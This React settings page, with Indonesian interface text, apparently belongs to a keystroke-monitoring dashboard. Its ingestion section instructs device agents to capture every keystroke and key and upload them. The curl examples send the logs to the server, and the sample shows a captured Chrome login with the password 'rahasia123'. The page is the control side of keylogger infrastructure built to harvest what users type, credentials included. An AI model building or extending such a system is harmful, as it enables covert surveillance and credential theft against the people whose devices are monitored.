import { useEffect, useState } from "react";
import { motion } from "framer-motion";
import api, { API, formatApiErrorDetail } from "@/lib/api";
import { useAuth } from "@/context/AuthContext";
import { Button } from "@/components/ui/button";
import { Slider } from "@/components/ui/slider";
import { Label } from "@/components/ui/label";
import { toast } from "sonner";
import { Loader2, Timer, Terminal, Save, Copy } from "lucide-react";

export default function Settings() {
  const { isMaster } = useAuth();
  const [threshold, setThreshold] = useState(5);
  const [loading, setLoading] = useState(true);
  const [saving, setSaving] = useState(false);

  useEffect(() => {
    api.get("/settings")
      .then(({ data }) => setThreshold(data.online_threshold_minutes))
      .finally(() => setLoading(false));
  }, []);

  const save = async () => {
    setSaving(true);
    try {
      await api.put("/settings", { online_threshold_minutes: threshold });
      toast.success("Setting disimpan");
    } catch (e) { toast.error(formatApiErrorDetail(e.response?.data?.detail)); }
    finally { setSaving(false); }
  };

  const curlSnippet = `curl -X POST ${API}/ingest/log \\
  -H "X-API-Key: <DEVICE_API_KEY>" \\
  -H "Content-Type: application/json" \\
  -d '{"entries":[{"window":"Chrome","text":"login admin[TAB]rahasia123[ENTER]","timestamp":"2026-06-12T08:00:10"}]}'`;

  const pingSnippet = `curl -X POST ${API}/ingest/ping \\
  -H "X-API-Key: <DEVICE_API_KEY>" \\
  -H "Content-Type: application/json" \\
  -d '{"ip":"192.168.1.21","os":"Windows 11"}'`;

  const copy = async (t) => {
    try { await navigator.clipboard.writeText(t); toast.success("Disalin"); }
    catch (e) {
      const ta = document.createElement("textarea");
      ta.value = t; document.body.appendChild(ta); ta.select();
      try { document.execCommand("copy"); toast.success("Disalin"); }
      catch (err) { toast.error("Gagal menyalin"); }
      document.body.removeChild(ta);
    }
  };

  if (loading) return <div className="flex justify-center py-20"><Loader2 className="animate-spin text-[#3B82F6]" size={28} /></div>;

  return (
    <div className="max-w-3xl">
      <div className="mb-6">
        <h1 className="font-display text-3xl sm:text-4xl font-extrabold tracking-tight">Setting</h1>
        <p className="text-[#9CA3AF] mt-1 text-sm">Konfigurasi ambang online & kontrak API ingestion untuk agent.</p>
      </div>

      <motion.div initial={{ opacity: 0, y: 12 }} animate={{ opacity: 1, y: 0 }} className="bg-[#111827] border border-[#1F2937] rounded-xl p-6 mb-6">
        <div className="flex items-center gap-2 mb-1">
          <Timer size={18} className="text-[#3B82F6]" />
          <h2 className="font-display text-lg font-semibold">Ambang Online</h2>
        </div>
        <p className="text-sm text-[#9CA3AF] mb-6">Perangkat dianggap <span className="text-[#EF4444]">offline</span> jika ping terakhir melewati ambang ini.</p>
        <div className="flex items-center gap-6">
          <div className="text-4xl font-display font-extrabold text-white w-24">{threshold}<span className="text-lg text-[#9CA3AF] ml-1">min</span></div>
          <Slider
            data-testid="online-threshold-slider"
            value={[threshold]}
            onValueChange={(v) => setThreshold(v[0])}
            min={1} max={30} step={1}
            disabled={!isMaster}
            className="flex-1"
          />
        </div>
        {isMaster && (
          <Button data-testid="save-settings-button" onClick={save} disabled={saving} className="mt-6 bg-[#3B82F6] hover:bg-[#2563EB]">
            {saving ? <Loader2 className="animate-spin" size={16} /> : <><Save size={16} className="mr-1.5" /> Simpan</>}
          </Button>
        )}
        {!isMaster && <p className="mt-4 text-xs text-[#6B7280]">Hanya master yang bisa mengubah setting.</p>}
      </motion.div>

      <motion.div initial={{ opacity: 0, y: 12 }} animate={{ opacity: 1, y: 0 }} transition={{ delay: 0.05 }} className="bg-[#111827] border border-[#1F2937] rounded-xl p-6">
        <div className="flex items-center gap-2 mb-1">
          <Terminal size={18} className="text-[#06B6D4]" />
          <h2 className="font-display text-lg font-semibold">Ingestion API (Agent)</h2>
        </div>
        <p className="text-sm text-[#9CA3AF] mb-5">Diamankan dengan <span className="text-[#22D3EE]">API key per-agent</span>. Ambil API key dari halaman Perangkat.</p>
        <div className="bg-[#0B0F17] border border-[#1F2937] rounded-lg p-3 mb-5 text-xs text-[#9CA3AF]">
          Agent cukup menangkap <span className="text-white">semua ketikan &amp; semua tombol</span> lalu kirim apa adanya ke field <code className="text-[#22D3EE]">text</code>. Tombol khusus tulis sebagai token, mis. <code className="text-[#FEF08A]">[ENTER]</code>, <code className="text-[#FEF08A]">[BACKSPACE]</code>, <code className="text-[#FEF08A]">[TAB]</code>, <code className="text-[#FEF08A]">[SHIFT]</code>, <code className="text-[#FEF08A]">[CTRL]</code>. Isi <code className="text-[#22D3EE]">window</code> dengan nama aplikasi aktif.
        </div>

        {[{ label: "Upload log", code: curlSnippet }, { label: "Heartbeat / ping", code: pingSnippet }].map((s) => (
          <div key={s.label} className="mb-4">
            <Label className="text-[#9CA3AF] text-xs uppercase tracking-wide">{s.label}</Label>
            <div className="relative mt-2">
              <pre className="bg-[#0B0F17] border border-[#1F2937] rounded-lg p-4 text-xs text-[#D1D5DB] overflow-x-auto font-mono whitespace-pre-wrap">{s.code}</pre>
              <button onClick={() => copy(s.code)} className="absolute top-2 right-2 text-[#6B7280] hover:text-white p-1"><Copy size={14} /></button>
            </div>
          </div>
        ))}
      </motion.div>
    </div>
  );
}
